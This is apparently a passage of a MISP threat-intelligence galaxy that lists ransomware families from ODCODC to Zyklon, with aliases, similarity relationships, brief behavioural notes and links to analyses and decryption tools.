The tag is: misp-galaxy:ransomware="ODCODC"

Table 5633. Table References
Links
http://download.bleepingcomputer.com/BloodDolly/ODCODCDecoder.zip
http://www.nyxbone.com/malware/odcodc.html
https://twitter.com/PolarToffee/status/813762510302183424
http://www.nyxbone.com/images/articulos/malware/odcodc/1c.png
http://id-ransomware.blogspot.com/2016/05/odcodc-ransomware-rsa-2048.html

Offline ransomware

Ransomware email addresses overlap with .777 addresses

The tag is: misp-galaxy:ransomware="Offline ransomware"

Offline ransomware is also known as:

Vipasana
Cryakl

View relationships graph

Offline ransomware has relationships with:

similar: misp-galaxy:ransomware="Cryakl" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Cryakl" with estimative-language:likelihood-probability="likely"

Table 5634. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547
http://bartblaze.blogspot.com.co/2016/02/vipasana-ransomware-new-ransom-on-block.html

OMG! Ransomware

Ransomware. Infection: drive-by-download; Platform: Windows; Extorsion by Prepaid Voucher

The tag is: misp-galaxy:ransomware="OMG! Ransomware"

OMG! Ransomware is also known as:

GPCode

View relationships graph

OMG! Ransomware has relationships with:

similar: misp-galaxy:malpedia="GPCode" with estimative-language:likelihood-probability="likely"

Table 5635. Table References
Links
https://arxiv.org/pdf/2102.06249.pdf

Operation Global III

Ransomware Is a file infector (virus)

The tag is: misp-galaxy:ransomware="Operation Global III"

Table 5636. Table References
Links
http://news.thewindowsclub.com/operation-global-iii-ransomware-decryption-tool-released-70341/

Owl

Ransomware

The tag is: misp-galaxy:ransomware="Owl"

Owl is also known as:

CryptoWire

View relationships graph

Owl has relationships with:

similar: misp-galaxy:malpedia="CryptoWire" with estimative-language:likelihood-probability="likely"

Table 5637. Table References
Links
https://twitter.com/JakubKroustek/status/842342996775448576
https://id-ransomware.blogspot.com/2016/10/cryptowire-ransomware.html

PadCrypt

Ransomware has a live support chat

The tag is: misp-galaxy:ransomware="PadCrypt"

View relationships graph

PadCrypt has relationships with:

similar: misp-galaxy:malpedia="PadCrypt" with estimative-language:likelihood-probability="likely"

Table 5638. Table References
Links
http://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/
https://twitter.com/malwrhunterteam/status/798141978810732544
http://id-ransomware.blogspot.com/2016/04/padcrypt-ransomware.html

Padlock Screenlocker

Ransomware Unlock code is: ajVr/G\ RJz0R

The tag is: misp-galaxy:ransomware="Padlock Screenlocker"

Table 5639. Table References
Links
https://twitter.com/BleepinComputer/status/811635075158839296

Patcher

Ransomware Targeting macOS users

The tag is: misp-galaxy:ransomware="Patcher"

View relationships graph

Patcher has relationships with:

similar: misp-galaxy:ransomware="FileCoder" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Patcher" with estimative-language:likelihood-probability="likely"

Table 5640. Table References
Links
https://blog.malwarebytes.com/cybercrime/2017/02/decrypting-after-a-findzip-ransomware-infection/
https://www.bleepingcomputer.com/news/security/new-macos-patcher-ransomware-locks-data-for-good-no-way-to-recover-your-files/

Petya

Ransomware encrypts disk partitions PDFBewerbungsmappe.exe

The tag is: misp-galaxy:ransomware="Petya"

Petya is also known as:

Goldeneye

View relationships graph

Petya has relationships with:

similar: misp-galaxy:malpedia="Petya" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="GoldenEye Ransomware" with estimative-language:likelihood-probability="likely"

Table 5641. Table References
Links
http://www.thewindowsclub.com/petya-ransomware-decrypt-tool-password-generator
https://www.youtube.com/watch?v=mSqxFjZq_z4
https://blog.malwarebytes.org/threat-analysis/2016/04/petya-ransomware/
https://www.bleepingcomputer.com/news/security/petya-ransomware-returns-with-goldeneye-version-continuing-james-bond-theme/

Philadelphia

Ransomware Coded by "The_Rainmaker"

The tag is: misp-galaxy:ransomware="Philadelphia"

Table 5642. Table References
Links
https://decrypter.emsisoft.com/philadelphia
www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/[www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/]
http://id-ransomware.blogspot.ru/2016/09/philadelphia-ransomware.html

PizzaCrypts

Ransomware

The tag is: misp-galaxy:ransomware="PizzaCrypts"

Table 5643. Table References
Links
http://download.bleepingcomputer.com/BloodDolly/JuicyLemonDecoder.zip
https://id-ransomware.blogspot.com/2016/07/pizzacrypts-ransomware-1.html

PokemonGO

Ransomware Based on Hidden Tear

The tag is: misp-galaxy:ransomware="PokemonGO"

Table 5644. Table References
Links
http://www.nyxbone.com/malware/pokemonGO.html
http://www.bleepingcomputer.com/news/security/pokemongo-ransomware-installs-backdoor-accounts-and-spreads-to-other-drives/
https://id-ransomware.blogspot.com/2016/08/pokemongo-ransomware-aes-256.html

Polyglot

Ransomware Immitates CTB-Locker

The tag is: misp-galaxy:ransomware="Polyglot"

View relationships graph

Polyglot has relationships with:

similar: misp-galaxy:malpedia="Polyglot" with estimative-language:likelihood-probability="likely"

Table 5645. Table References
Links
https://support.kaspersky.com/8547
https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/

PowerWare

Ransomware Open-sourced PowerShell

The tag is: misp-galaxy:ransomware="PowerWare"

PowerWare is also known as:

PoshCoder

View relationships graph

PowerWare has relationships with:

similar: misp-galaxy:malpedia="PowerWare" with estimative-language:likelihood-probability="likely"

Table 5646. Table References
Links
https://github.com/pan-unit42/public_tools/blob/master/powerware/powerware_decrypt.py
https://download.bleepingcomputer.com/demonslay335/PowerLockyDecrypter.zip
https://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word/
http://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/
http://id-ransomware.blogspot.com/2016/04/powerware-ransomware.html

PowerWorm

Ransomware no decryption possible, throws key away, destroys the files

The tag is: misp-galaxy:ransomware="PowerWorm"

Princess Locker

Ransomware

The tag is: misp-galaxy:ransomware="Princess Locker"

Table 5647. Table References
Links
https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/
https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/
https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/
http://id-ransomware.blogspot.com/2016/09/princess-locker-ransomware.html

PRISM

Ransomware

The tag is: misp-galaxy:ransomware="PRISM"

Table 5648. Table References
Links
http://www.enigmasoftware.com/prismyourcomputerhasbeenlockedransomware-removal/

Ps2exe

Ransomware

The tag is: misp-galaxy:ransomware="Ps2exe"

Table 5649. Table References
Links
https://twitter.com/jiriatvirlab/status/803297700175286273

R

Ransomware

The tag is: misp-galaxy:ransomware="R"

R is also known as:

Table 5650. Table References
Links
https://twitter.com/malwrhunterteam/status/846705481741733892
http://id-ransomware.blogspot.com/2017/03/r-ransomware.html

R980

Ransomware

The tag is: misp-galaxy:ransomware="R980"

Table 5651. Table References
Links
https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/
http://id-ransomware.blogspot.com/2016/07/r980-ransomware-aes-256-rsa4096-05.html

RAA encryptor

Ransomware Possible affiliation with Pony

The tag is: misp-galaxy:ransomware="RAA encryptor"

RAA encryptor is also known as:

RAA
RAA SEP

Table 5652. Table References
Links
https://reaqta.com/2016/06/raa-ransomware-delivering-pony/
http://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/
https://id-ransomware.blogspot.com/2016/06/raa-ransomware-aes-256-039-250.html

Rabion

Ransomware RaaS Copy of Ranion RaaS

The tag is: misp-galaxy:ransomware="Rabion"

Table 5653. Table References
Links
https://twitter.com/CryptoInsane/status/846181140025282561

Radamant

Ransomware

The tag is: misp-galaxy:ransomware="Radamant"

View relationships graph

Radamant has relationships with:

similar: misp-galaxy:malpedia="Radamant" with estimative-language:likelihood-probability="likely"

Table 5654. Table References
Links
https://decrypter.emsisoft.com/radamant
http://www.bleepingcomputer.com/news/security/new-radamant-ransomware-kit-adds-rdm-extension-to-encrypted-files/
http://www.nyxbone.com/malware/radamant.html
https://id-ransomware.blogspot.com/2016/04/radamant-ransomware.html

Rakhni

Ransomware Files might be partially encrypted

The tag is: misp-galaxy:ransomware="Rakhni"

Rakhni is also known as:

Agent.iih
Aura
Autoit
Pletor
Rotor
Lamer
Isda
Cryptokluchen
Bandarchor

View relationships graph

Rakhni has relationships with:

similar: misp-galaxy:ransomware="Bandarchor" with estimative-language:likelihood-probability="likely"

Table 5655. Table References
Links
https://support.kaspersky.com/us/viruses/disinfection/10556
https://id-ransomware.blogspot.com/2016/07/bandarchor-ransomware-aes-256.html

Ramsomeer

Ransomware Based on the DUMB ransomware

The tag is: misp-galaxy:ransomware="Ramsomeer"

Rannoh

Ransomware

The tag is: misp-galaxy:ransomware="Rannoh"

Table 5656. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547

RanRan

Ransomware

The tag is: misp-galaxy:ransomware="RanRan"

RanRan is also known as:

Table 5657. Table References
Links
https://github.com/pan-unit42/public_tools/tree/master/ranran_decryption
http://researchcenter.paloaltonetworks.com/2017/03/unit42-targeted-ransomware-attacks-middle-eastern-government-organizations-political-purposes/
https://www.bleepingcomputer.com/news/security/new-ranran-ransomware-uses-encryption-tiers-political-messages/

Ransoc

Ransomware Doesn’t encrypt user files

The tag is: misp-galaxy:ransomware="Ransoc"

View relationships graph

Ransoc has relationships with:

similar: misp-galaxy:malpedia="Ransoc" with estimative-language:likelihood-probability="likely"

Table 5658. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles
https://www.bleepingcomputer.com/news/security/ransoc-ransomware-extorts-users-who-accessed-questionable-content/

Ransom32

Ransomware no extension change, Javascript Ransomware

The tag is: misp-galaxy:ransomware="Ransom32"

Table 5659. Table References
Links
http://id-ransomware.blogspot.com/2016/04/ransom32.html

RansomLock

Ransomware Locks the desktop

The tag is: misp-galaxy:ransomware="RansomLock"

Table 5660. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2009-041513-1400-99&tabid=2

RarVault

Ransomware

The tag is: misp-galaxy:ransomware="RarVault"

Table 5661. Table References
Links
http://id-ransomware.blogspot.com/2016/09/rarvault-ransomware.html

Razy

Ransomware

The tag is: misp-galaxy:ransomware="Razy"

Table 5662. Table References
Links
http://www.nyxbone.com/malware/Razy(German).html
http://nyxbone.com/malware/Razy.html
http://id-ransomware.blogspot.com/2016/08/razy-ransomware-aes.html

Rector

Ransomware

The tag is: misp-galaxy:ransomware="Rector"

Table 5663. Table References
Links
https://support.kaspersky.com/viruses/disinfection/4264

RektLocker

Ransomware

The tag is: misp-galaxy:ransomware="RektLocker"

Table 5664. Table References
Links
https://support.kaspersky.com/viruses/disinfection/4264
http://id-ransomware.blogspot.com/2016/08/rektlocker-ransomware.html

RemindMe

Ransomware

The tag is: misp-galaxy:ransomware="RemindMe"

Table 5665. Table References
Links
http://www.nyxbone.com/malware/RemindMe.html
http://i.imgur.com/gV6i5SN.jpg
http://id-ransomware.blogspot.com/2016/05/remindme-ransomware-2.html

Rokku

Ransomware possibly related with Chimera

The tag is: misp-galaxy:ransomware="Rokku"

View relationships graph

Rokku has relationships with:

similar: misp-galaxy:malpedia="Rokku" with estimative-language:likelihood-probability="likely"

Table 5666. Table References
Links
https://blog.malwarebytes.org/threat-analysis/2016/04/rokku-ransomware/
https://id-ransomware.blogspot.com/2016/04/rokku-ransomware.html

RoshaLock

Ransomware Stores your files in a password protected RAR file

The tag is: misp-galaxy:ransomware="RoshaLock"

Table 5667. Table References
Links
https://twitter.com/siri_urz/status/842452104279134209
https://id-ransomware.blogspot.com/2017/02/allyourdocuments-ransomware.html

Runsomewere

Ransomware Based on HT/EDA2 Utilizes the Jigsaw Ransomware background

The tag is: misp-galaxy:ransomware="Runsomewere"

Table 5668. Table References
Links
https://twitter.com/struppigel/status/801812325657440256

RussianRoulette

Ransomware Variant of the Philadelphia ransomware

The tag is: misp-galaxy:ransomware="RussianRoulette"

Table 5669. Table References
Links
https://twitter.com/struppigel/status/823925410392080385

SADStory

Ransomware Variant of CryPy

The tag is: misp-galaxy:ransomware="SADStory"

Table 5670. Table References
Links
https://twitter.com/malwrhunterteam/status/845356853039190016
http://id-ransomware.blogspot.com/2017/03/sadstory-ransomware.html

Sage 2.2

Ransomware Sage 2.2 deletes volume snapshots through vssadmin.exe, disables startup repair, uses process wscript.exe to execute a VBScript, and coordinates the execution of scheduled tasks via schtasks.exe.

The tag is: misp-galaxy:ransomware="Sage 2.2"

Table 5671. Table References
Links
https://malwarebreakdown.com/2017/03/16/sage-2-2-ransomware-from-good-man-gate
https://malwarebreakdown.com/2017/03/10/finding-a-good-man/

Samas-Samsam

Ransomware Targeted attacks -Jexboss -PSExec -Hyena

The tag is: misp-galaxy:ransomware="Samas-Samsam"

Samas-Samsam is also known as:

samsam.exe
MIKOPONI.exe
RikiRafael.exe
showmehowto.exe
SamSam Ransomware
SamSam
Samsam
Samas

View relationships graph

Samas-Samsam has relationships with:

similar: misp-galaxy:malpedia="SamSam" with estimative-language:likelihood-probability="likely"

Table 5672. Table References
Links
https://download.bleepingcomputer.com/demonslay335/SamSamStringDecrypter.zip
http://blog.talosintel.com/2016/03/samsam-ransomware.html
http://www.intelsecurity.com/advanced-threat-research/content/Analysis_SamSa_Ransomware.pdf
https://www.bleepingcomputer.com/news/security/new-samsam-variant-requires-special-password-before-infection/
https://www.bleepingcomputer.com/news/security/samsam-ransomware-crew-made-nearly-6-million-from-ransom-payments/
https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf
https://id-ransomware.blogspot.com/2016/03/samsam.html

Sanction

Ransomware Based on HiddenTear, but heavily modified keygen

The tag is: misp-galaxy:ransomware="Sanction"

Table 5673. Table References
Links
http://id-ransomware.blogspot.com/2016/05/sanction-ransomware-3.html

Sanctions

Ransomware

The tag is: misp-galaxy:ransomware="Sanctions"

Sanctions is also known as:

Sanctions 2017

Table 5674. Table References
Links
https://www.bleepingcomputer.com/news/security/sanctions-ransomware-makes-fun-of-usa-sanctions-against-russia/
http://id-ransomware.blogspot.com/2017/03/sanctions-2017-ransomware.html

Sardoninir

Ransomware

The tag is: misp-galaxy:ransomware="Sardoninir"

Table 5675. Table References
Links
https://twitter.com/BleepinComputer/status/835955409953357825

Satana

Ransomware

The tag is: misp-galaxy:ransomware="Satana"

View relationships graph

Satana has relationships with:

similar: misp-galaxy:malpedia="Satana" with estimative-language:likelihood-probability="likely"

Table 5676. Table References
Links
https://blog.malwarebytes.com/threat-analysis/2016/06/satana-ransomware/
https://blog.kaspersky.com/satana-ransomware/12558/
https://id-ransomware.blogspot.com/2016/06/satana-ransomware-0.html

Scraper

Ransomware

The tag is: misp-galaxy:ransomware="Scraper"

Table 5677. Table References
Links
http://securelist.com/blog/research/69481/a-flawed-ransomware-encryptor/

Serpico

Ransomware DetoxCrypto Variant

The tag is: misp-galaxy:ransomware="Serpico"

View relationships graph

Serpico has relationships with:

similar: misp-galaxy:malpedia="Serpico" with estimative-language:likelihood-probability="likely"

Table 5678. Table References
Links
http://www.nyxbone.com/malware/Serpico.html
http://id-ransomware.blogspot.com/2016/08/serpico-ransomware.html

Shark

Ransomware

The tag is: misp-galaxy:ransomware="Shark"

Shark is also known as:

Atom

View relationships graph

Shark has relationships with:

similar: misp-galaxy:rat="SharK" with estimative-language:likelihood-probability="likely"

Table 5679. Table References
Links
http://www.bleepingcomputer.com/news/security/the-shark-ransomware-project-allows-to-create-your-own-customized-ransomware/
http://www.bleepingcomputer.com/news/security/shark-ransomware-rebrands-as-atom-for-a-fresh-start/

ShinoLocker

Ransomware

The tag is: misp-galaxy:ransomware="ShinoLocker"

Table 5680. Table References
Links
https://twitter.com/JakubKroustek/status/760560147131408384
http://www.bleepingcomputer.com/news/security/new-educational-shinolocker-ransomware-project-released/
https://id-ransomware.blogspot.com/2016/08/shinolocker-ransomware.html

Shujin

Ransomware

The tag is: misp-galaxy:ransomware="Shujin"

Shujin is also known as:

KinCrypt

View relationships graph

Shujin has relationships with:

similar: misp-galaxy:malpedia="Shujin" with estimative-language:likelihood-probability="likely"

Table 5681. Table References
Links
http://www.nyxbone.com/malware/chineseRansom.html
http://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/
http://id-ransomware.blogspot.com/2016/05/chinese-ransomware.html

Simple_Encoder

Ransomware

The tag is: misp-galaxy:ransomware="Simple_Encoder"

Simple_Encoder is also known as:

Tilde

Table 5682. Table References
Links
http://www.bleepingcomputer.com/news/security/the-shark-ransomware-project-allows-to-create-your-own-customized-ransomware/
https://id-ransomware.blogspot.com/2016/07/tilde-ransomware-aes-08.html

SkidLocker

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="SkidLocker"

SkidLocker is also known as:

Pompous

Table 5683. Table References
Links
http://www.bleepingcomputer.com/news/security/pompous-ransomware-dev-gets-defeated-by-backdoor/
http://www.nyxbone.com/malware/SkidLocker.html
http://id-ransomware.blogspot.com/2016/04/pompous-ransomware.html

Smash!

Ransomware

The tag is: misp-galaxy:ransomware="Smash!"

Table 5684. Table References
Links
https://www.bleepingcomputer.com/news/security/smash-ransomware-is-cute-rather-than-dangerous/

Smrss32

Ransomware

The tag is: misp-galaxy:ransomware="Smrss32"

Table 5685. Table References
Links
http://id-ransomware.blogspot.com/2016/08/smrss32-ransomware.html

SNSLocker

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="SNSLocker"

Table 5686. Table References
Links
http://nyxbone.com/malware/SNSLocker.html
http://nyxbone.com/images/articulos/malware/snslocker/16.png
http://id-ransomware.blogspot.com/2016/05/sns-locker-ransomware-aes-256-066.html

Sport

Ransomware

The tag is: misp-galaxy:ransomware="Sport"

Stampado

Ransomware Coded by "The_Rainmaker" Randomly deletes a file every 6hrs up to 96hrs then deletes decryption key

The tag is: misp-galaxy:ransomware="Stampado"

Table 5687. Table References
Links
https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221
http://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/
https://decrypter.emsisoft.com/stampado
https://cdn.streamable.com/video/mp4/kfh3.mp4
http://blog.trendmicro.com/trendlabs-security-intelligence/the-economics-behind-ransomware-prices/
https://id-ransomware.blogspot.com/2016/07/stampado-ransomware-1.html

Strictor

Ransomware Based on EDA2, shows Guy Fawkes mask

The tag is: misp-galaxy:ransomware="Strictor"

Table 5688. Table References
Links
http://www.nyxbone.com/malware/Strictor.html

Surprise

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Surprise"

Table 5689. Table References
Links
http://id-ransomware.blogspot.com/2016/05/surprise-ransomware-aes-256.html

Survey

Ransomware Still in development, shows FileIce survey

The tag is: misp-galaxy:ransomware="Survey"

Table 5690. Table References
Links
http://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/

SynoLocker

Ransomware Exploited Synology NAS firmware directly over WAN

The tag is: misp-galaxy:ransomware="SynoLocker"

SZFLocker

Ransomware

The tag is: misp-galaxy:ransomware="SZFLocker"

Table 5691. Table References
Links
http://now.avg.com/dont-pay-the-ransom-avg-releases-six-free-decryption-tools-to-retrieve-your-files/
https://id-ransomware.blogspot.com/2016/06/szflocker-polish-ransomware-email.html

TeamXrat

Ransomware

The tag is: misp-galaxy:ransomware="TeamXrat"

Table 5692. Table References
Links
https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/

TeslaCrypt 0.x - 2.2.0

Ransomware Factorization

The tag is: misp-galaxy:ransomware="TeslaCrypt 0.x - 2.2.0"

TeslaCrypt 0.x - 2.2.0 is also known as:

AlphaCrypt

Table 5693. Table References
Links
http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/
http://www.talosintel.com/teslacrypt_tool/

TeslaCrypt 3.0+

Ransomware 4.0+ has no extension

The tag is: misp-galaxy:ransomware="TeslaCrypt 3.0+"

Table 5694. Table References
Links
http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/
http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/
https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/

TeslaCrypt 4.1A

Ransomware

The tag is: misp-galaxy:ransomware="TeslaCrypt 4.1A"

Table 5695. Table References
Links
http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/
http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/
https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/
https://www.endgame.com/blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack-chain

TeslaCrypt 4.2

Ransomware

The tag is: misp-galaxy:ransomware="TeslaCrypt 4.2"

Table 5696. Table References
Links
http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/
http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/
https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/
http://www.bleepingcomputer.com/news/security/teslacrypt-4-2-released-with-quite-a-few-modifications/

Threat Finder

Ransomware Files cannot be decrypted Has a GUI

The tag is: misp-galaxy:ransomware="Threat Finder"

TorrentLocker

Ransomware Newer variants not decryptable. Only first 2 MB are encrypted

The tag is: misp-galaxy:ransomware="TorrentLocker"

TorrentLocker is also known as:

Crypt0L0cker
CryptoFortress
Teerac

View relationships graph

TorrentLocker has relationships with:

similar: misp-galaxy:ransomware="CryptoFortress" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="CryptoFortress" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="TorrentLocker" with estimative-language:likelihood-probability="likely"

Table 5697. Table References
Links
http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/
https://twitter.com/PolarToffee/status/804008236600934403
http://blog.talosintelligence.com/2017/03/crypt0l0cker-torrentlocker-old-dog-new.html
http://id-ransomware.blogspot.ru/2016/05/torrentlocker-ransomware-aes-cbc-2048.html

TowerWeb

Ransomware

The tag is: misp-galaxy:ransomware="TowerWeb"

Table 5698. Table References
Links
http://www.bleepingcomputer.com/forums/t/618055/towerweb-ransomware-help-support-topic-payment-instructionsjpg/
https://id-ransomware.blogspot.com/2016/06/towerweb-ransonware-100.html

Toxcrypt

Ransomware

The tag is: misp-galaxy:ransomware="Toxcrypt"

Table 5699. Table References
Links
https://id-ransomware.blogspot.com/2016/06/toxcrypt-ransomware-aes-crypto-0.html

Trojan

Ransomware

The tag is: misp-galaxy:ransomware="Trojan"

Trojan is also known as:

BrainCrypt

Table 5700. Table References
Links
https://download.bleepingcomputer.com/demonslay335/BrainCryptDecrypter.zip
https://twitter.com/PolarToffee/status/811249250285842432
http://id-ransomware.blogspot.com/2016/12/braincrypt-ransomware.html

Troldesh orShade, XTBL

Ransomware May download additional malware after encryption

The tag is: misp-galaxy:ransomware="Troldesh orShade, XTBL"

Troldesh orShade, XTBL is also known as:

Shade
Troldesh

Table 5701. Table References
Links
https://www.nomoreransom.org/uploads/ShadeDecryptor_how-to_guide.pdf
http://www.nyxbone.com/malware/Troldesh.html
https://www.bleepingcomputer.com/news/security/kelihos-botnet-delivering-shade-troldesh-ransomware-with-no-more-ransom-extension/
https://id-ransomware.blogspot.com/2016/06/troldesh-ransomware-email.html

TrueCrypter

Ransomware

The tag is: misp-galaxy:ransomware="TrueCrypter"

Table 5702. Table References
Links
http://www.bleepingcomputer.com/news/security/truecrypter-ransomware-accepts-payment-in-bitcoins-or-amazon-gift-card/
http://id-ransomware.blogspot.com/2016/04/truecrypter-ransomware.html

Turkish

Ransomware

The tag is: misp-galaxy:ransomware="Turkish"

Table 5703. Table References
Links
https://twitter.com/struppigel/status/821991600637313024

Turkish Ransom

Ransomware

The tag is: misp-galaxy:ransomware="Turkish Ransom"

Table 5704. Table References
Links
http://www.nyxbone.com/malware/turkishRansom.html

UmbreCrypt

Ransomware CrypBoss Family

The tag is: misp-galaxy:ransomware="UmbreCrypt"

Table 5705. Table References
Links
http://www.thewindowsclub.com/emsisoft-decrypter-hydracrypt-umbrecrypt-ransomware
https://id-ransomware.blogspot.com/2016/06/umbrecrypt-ransomware-aes.html

UnblockUPC

Ransomware

The tag is: misp-galaxy:ransomware="UnblockUPC"

Table 5706. Table References
Links
https://www.bleepingcomputer.com/forums/t/627582/unblockupc-ransomware-help-support-topic-files-encryptedtxt/
http://id-ransomware.blogspot.com/2016/09/unblockupc-ransomware.html

Ungluk

Ransomware Ransom note instructs to use Bitmessage to get in contact with attacker - Secretishere.key - SECRETISHIDINGHEREINSIDE.KEY - secret.key

The tag is: misp-galaxy:ransomware="Ungluk"

Table 5707. Table References
Links
http://id-ransomware.blogspot.com/2016/05/bitmessage-ransomware-aes-256-25-btc.html

Unlock92

Ransomware

The tag is: misp-galaxy:ransomware="Unlock92 "

Table 5708. Table References
Links
https://twitter.com/malwrhunterteam/status/839038399944224768
http://id-ransomware.blogspot.com/2017/02/unlock26-ransomware.html

VapeLauncher

Ransomware CryptoWire variant

The tag is: misp-galaxy:ransomware="VapeLauncher"

Table 5709. Table References
Links
https://twitter.com/struppigel/status/839771195830648833

VaultCrypt

Ransomware

The tag is: misp-galaxy:ransomware="VaultCrypt"

VaultCrypt is also known as:

CrypVault
Zlader

View relationships graph

VaultCrypt has relationships with:

similar: misp-galaxy:ransomware="Zlader" with estimative-language:likelihood-probability="likely"

Table 5710. Table References
Links
http://www.nyxbone.com/malware/russianRansom.html

VBRANSOM 7

Ransomware

The tag is: misp-galaxy:ransomware="VBRANSOM 7"

Table 5711. Table References
Links
https://twitter.com/BleepinComputer/status/817851339078336513

VenusLocker

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="VenusLocker"

Table 5712. Table References
Links
https://blog.malwarebytes.com/threat-analysis/2016/08/venus-locker-another-net-ransomware/?utm_source=twitter&utm_medium=social
http://www.nyxbone.com/malware/venusLocker.html
https://id-ransomware.blogspot.com/2016/08/venuslocker-ransomware-aes-256.html

Virlock

Ransomware Polymorphism / Self-replication

The tag is: misp-galaxy:ransomware="Virlock"

Virlock is also known as:

NSMF

Table 5713. Table References
Links
http://www.nyxbone.com/malware/Virlock.html
http://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/

Virus-Encoder

Ransomware

The tag is: misp-galaxy:ransomware="Virus-Encoder"

Virus-Encoder is also known as:

CrySiS

Table 5714. Table References
Links
http://www.welivesecurity.com/2016/11/24/new-decryption-tool-crysis-ransomware/
http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip
http://www.nyxbone.com/malware/virus-encoder.html
http://blog.trendmicro.com/trendlabs-security-intelligence/crysis-targeting-businesses-in-australia-new-zealand-via-brute-forced-rdps/

WildFire Locker

Ransomware Zyklon variant

The tag is: misp-galaxy:ransomware="WildFire Locker"

WildFire Locker is also known as:

Hades Locker

View relationships graph

WildFire Locker has relationships with:

similar: misp-galaxy:ransomware="Hades" with estimative-language:likelihood-probability="likely"

Table 5715. Table References
Links
https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/
https://id-ransomware.blogspot.com/2016/06/wildfire-locker-ransomware-aes-256-cbc.html

Xorist

Ransomware encrypted files will still have the original non-encrypted header of 0x33 bytes length

The tag is: misp-galaxy:ransomware="Xorist"

Table 5716. Table References
Links
https://support.kaspersky.com/viruses/disinfection/2911
https://decrypter.emsisoft.com/xorist
https://twitter.com/siri_urz/status/1006833669447839745
https://id-ransomware.blogspot.com/2016/06/xrtn-ransomware-rsa-1024-gnu-privacy.html

XRTN

Ransomware VaultCrypt family

The tag is: misp-galaxy:ransomware="XRTN "

You Have Been Hacked!!!

Ransomware Attempt to steal passwords

The tag is: misp-galaxy:ransomware="You Have Been Hacked!!!"

Table 5717. Table References
Links
https://twitter.com/malwrhunterteam/status/808280549802418181

Zcrypt

Ransomware

The tag is: misp-galaxy:ransomware="Zcrypt"

Zcrypt is also known as:

Zcryptor

Table 5718. Table References
Links
https://blogs.technet.microsoft.com/mmpc/2016/05/26/link-lnk-to-ransom/
http://id-ransomware.blogspot.com/2016/05/zcrypt-ransomware-rsa-2048-email.html

Zimbra

Ransomware mpritsken@priest.com

The tag is: misp-galaxy:ransomware="Zimbra"

Table 5719. Table References
Links
http://www.bleepingcomputer.com/forums/t/617874/zimbra-ransomware-written-in-python-help-and-support-topic-crypto-howtotxt/
https://id-ransomware.blogspot.com/2016/06/zimbra-ransomware-aes-optzimbrastore.html

Zlader

Ransomware VaultCrypt family

The tag is: misp-galaxy:ransomware="Zlader"

Zlader is also known as:

Russian
VaultCrypt
CrypVault

View relationships graph

Zlader has relationships with:

similar: misp-galaxy:ransomware="VaultCrypt" with estimative-language:likelihood-probability="likely"

Table 5720. Table References
Links
http://www.nyxbone.com/malware/russianRansom.html

Zorro

Ransomware

The tag is: misp-galaxy:ransomware="Zorro"

Table 5721. Table References
Links
https://twitter.com/BleepinComputer/status/844538370323812353
http://id-ransomware.blogspot.com/2017/03/zorro-ransomware.html

Zyklon

Ransomware Hidden Tear family, GNL Locker variant

The tag is: misp-galaxy:ransomware="Zyklon"

Zyklon is also known as:

GNL Locker
Zyklon Locker

View relationships graph

Zyklon has relationships with:

